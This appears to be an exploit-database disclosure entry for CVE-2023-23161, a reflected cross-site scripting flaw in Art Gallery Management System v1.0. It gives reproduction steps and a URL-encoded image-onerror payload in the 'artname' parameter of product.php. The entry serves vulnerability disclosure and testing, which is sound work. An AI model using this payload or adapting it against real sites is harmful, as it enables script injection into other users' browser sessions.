Share
## https://sploitus.com/exploit?id=PACKETSTORM:171642
# Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)  
# Date: 20/01/2023  
# Exploit Author: Rahul Patwari  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip  
# Version: 1.0  
# Tested on: XAMPP / Windows 10  
# CVE : CVE-2023-23161  
  
# Proof of Concept:  
# 1- Install The application Art Gallery Management System Project v1.0  
  
# 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints  
  
# 3- Now Insert XSS Payload on artname parameter.  
the XSS Payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E  
  
# 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E  
  
# 5- XSS has been triggered.  
  
# Go to this url "  
https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E  
"  
XSS will trigger.